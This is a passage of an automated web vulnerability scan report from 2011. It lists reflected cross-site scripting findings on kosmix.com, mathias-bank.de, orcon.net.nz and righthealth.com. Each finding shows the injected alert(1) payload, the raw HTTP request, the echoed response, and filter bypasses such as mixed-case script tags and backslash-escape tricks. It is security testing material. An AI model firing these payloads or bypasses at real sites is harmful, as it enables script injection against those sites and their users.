4.35. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4932b\"%3b512738e9867 was submitted in the REST URL parameter 2. This input was echoed as 4932b\\";512738e9867 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /stylesheets/4932b\"%3b512738e9867/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:47 GMT;path=/
Content-Length: 16531

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1440764625";
   kl.query = "4932b\\";512738e9867";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.36. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35743"><script>alert(1)</script>5e644aedf8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35743\"><script>alert(1)</script>5e644aedf8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35743"><script>alert(1)</script>5e644aedf8f=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:47:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1305481674+173.193.214.243; path=/
Set-Cookie: PHPSESSID=ef8522246882e6c8d9f89abbce94c37c; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form enctype="multipart/form-data" action="/?35743\"><script>alert(1)</script>5e644aedf8f=1#usermessagea" method="post" class="cform" id="cformsform">
...[SNIP]...

4.37. http://www.orcon.net.nz/address_locator/=&type=orconatwork [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orcon.net.nz
Path:   /address_locator/=&type=orconatwork

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cebce</script><script>alert(1)</script>30cb7ccddae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /address_locator/=&type=orconatwork?cebce</script><script>alert(1)</script>30cb7ccddae=1 HTTP/1.1
Host: www.orcon.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=9264363.1305480184.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9264363.834091965.1305480184.1305480184.1305480184.1; exp_last_visit=990076976; __utmc=9264363; exp_last_activity=1305437095; __utmb=9264363.7.10.1305480184; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fbrowse%2Fcategory%2Facquisitions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fmobile%2F%22%3Bi%3A3%3Bs%3A12%3A%22%2Fsite%2Flogin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:57:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 17:57:18 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: exp_last_activity=1305439038; expires=Mon, 14-May-2012 17:57:18 GMT; path=/
Connection: close
Content-Length: 12693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
;

$(document).ready(function() {
    $("#addressSearch").validate();
//fullURL = parent.document.URL;
//type = fullURL.substring(fullURL.indexOf('?')+6, fullURL.length);
var type = "orconatworkcebce</script><script>alert(1)</script>30cb7ccddae=1";

if(type == "orconatwork"){
connectionURL = 'atwork.php';
}else{
connectionURL = 'athome.php';
}


/*
$.ajax({
type: "GET",
url: "/modules/views/
...[SNIP]...

4.38. http://www.righthealth.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c39f"%3balert(1)//60590ec83f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c39f";alert(1)//60590ec83f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5c39f"%3balert(1)//60590ec83f6=1 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:23 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=082e6b80-615c-012e-2f5e-003048fe4c0a; path=/; expires=Sat, 15-May-2021 20:01:23 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:01:23 GMT
Set-Cookie: KC=K; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:23 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b045525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:16:23 GMT;path=/
Content-Length: 56012

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
sive_banner_ad"] = "";
       searchParams["urchin_id"] = "UA-2133509-1";
       searchParams["referrer_query"] = "";
       searchParams["q_lower"] = "kosmixhomepage";
       searchParams["abtest"] = "";
       searchParams["5c39f";alert(1)//60590ec83f6"] = "1";
       searchParams["results_lang"] = "en";
       searchParams["ac"] = "1299";
       searchParams["buildid"] = "153574";
       searchParams["referrer"] = "";
       searchParams["q_category_kcsid"] = "0";
       search
...[SNIP]...

4.39. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /c-javascripts76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225/kapp_relevance.js?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts76cce%22%3E%3CScRiPt%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:12 GMT;path=/
Content-Length: 20713

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/c-javascripts76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225/kapp_relevance.js"/>
...[SNIP]...

4.40. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8debe<img%20src%3da%20onerror%3dalert(1)>fe2e1dab582 was submitted in the REST URL parameter 2. This input was echoed as 8debe<img src=a onerror=alert(1)>fe2e1dab582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c-javascripts/kapp_relevance.js8debe<img%20src%3da%20onerror%3dalert(1)>fe2e1dab582?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:55 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:54 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:55 GMT;path=/
Content-Length: 20915

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>Kapp Relevance.js8debe<img Src=a Onerror=alert(1)>fe2e1dab582</strong>
...[SNIP]...

4.41. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba315"style%3d"x%3aexpression(alert(1))"708e8d9fd20 was submitted in the REST URL parameter 2. This input was echoed as ba315"style="x:expression(alert(1))"708e8d9fd20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /c-javascripts/kapp_relevance.jsba315"style%3d"x%3aexpression(alert(1))"708e8d9fd20?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:42 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:42 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:42 GMT;path=/
Content-Length: 20945

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Kapp Relevance.jsba315"style="x:expression(alert(1))"708e8d9fd20" />
...[SNIP]...

4.42. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4411c\"%3baaf03005ad2 was submitted in the REST URL parameter 2. This input was echoed as 4411c\\";aaf03005ad2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /c-javascripts/kapp_relevance.js4411c\"%3baaf03005ad2?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:44 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:44 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:44 GMT;path=/
Content-Length: 20660

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ext/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1574211534";
   kl.query = "Kapp+Relevance.js4411c\\";aaf03005ad2";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.43. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ea9de<img%20src%3da%20onerror%3dalert(1)>5a005695197 was submitted in the REST URL parameter 2. This input was echoed as ea9de<img src=a onerror=alert(1)>5a005695197 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /images/healthea9de<img%20src%3da%20onerror%3dalert(1)>5a005695197/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:43 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:43 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:43 GMT;path=/
Content-Length: 20642

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>Healthea9de<img Src=a Onerror=alert(1)>5a005695197</strong>
...[SNIP]...

4.44. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc29b\"%3b1cf7eaa7765 was submitted in the REST URL parameter 2. This input was echoed as bc29b\\";1cf7eaa7765 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/healthbc29b\"%3b1cf7eaa7765/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:32 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:32 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:32 GMT;path=/
Content-Length: 20413

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ript type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "838229798";
   kl.query = "Healthbc29b\\";1cf7eaa7765";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "";
   kl.build_id = '153574';
   kl.release_id = 'EVEREST.REL.BLD.
...[SNIP]...

4.45. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be586"style%3d"x%3aexpression(alert(1))"8bb8d80a2ee was submitted in the REST URL parameter 2. This input was echoed as be586"style="x:expression(alert(1))"8bb8d80a2ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /images/healthbe586"style%3d"x%3aexpression(alert(1))"8bb8d80a2ee/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:30 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:30 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:30 GMT;path=/
Content-Length: 20669

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Healthbe586"style="x:expression(alert(1))"8bb8d80a2ee favicon.ico" />
...[SNIP]...

4.46. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37928"><img%20src%3da%20onerror%3dalert(1)>5d6aa7d5381 was submitted in the REST URL parameter 3. This input was echoed as 37928"><img src=a onerror=alert(1)>5d6aa7d5381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /images/health/favicon.ico37928"><img%20src%3da%20onerror%3dalert(1)>5d6aa7d5381 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
